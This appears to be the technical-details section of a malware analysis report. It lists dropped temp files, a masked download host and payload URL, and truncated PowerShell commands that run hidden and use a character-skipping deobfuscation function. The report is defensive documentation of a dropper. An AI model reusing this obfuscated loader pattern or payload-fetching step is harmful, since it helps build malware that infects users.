Technical Information
- %APPDATA%\bitba97.tmp
- %APPDATA%\bit14f7.tmp
- %APPDATA%\bitba97.tmp
- %APPDATA%\bit14f7.tmp
- from %APPDATA%\bitba97.tmp to %APPDATA%\dolmane.dis
- from %APPDATA%\bit14f7.tmp to %APPDATA%\dolmane.dis
- 'be#####rebrewers.com':80
- http://be#####rebrewers.com/FRZ1/Forskan.java
- DNS ASK be#####rebrewers.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Skatteafd9 ([String]$heiri){For($Filt=4; $Filt -lt $heiri.Length-1; $Filt+=(4+1)){$Desca=$heiri.Substring( $Filt, 1);$Democrat+=$Desca};$Democrat;}$Dorsalw=Skatteafd9 'Non...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Skatteafd9 ([String]$heiri){For($Filt=4; $Filt -lt $heiri.Length-1; $Filt+=(4+1)){$Desca=$heiri.Substring( $Filt, 1);$Democrat+=$Desca};$Democrat;}$Dorsalw=Skatteafd9 'Non...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Skatteafd9 ([String]$heiri){For($Filt=4; $Filt -lt $heiri.Length-1; $Filt+=(4+1)){$Desca=$heiri.Substring( $Filt, 1);$Democrat+=$Desca};$Democrat;}$Dorsalw=Skatteafd9 'Non...